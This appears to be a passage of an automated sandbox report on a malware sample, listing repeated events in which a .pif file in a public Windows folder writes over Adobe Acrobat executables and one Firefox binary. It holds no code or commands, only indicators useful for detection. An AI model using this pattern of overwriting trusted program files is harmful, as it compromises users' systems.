Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
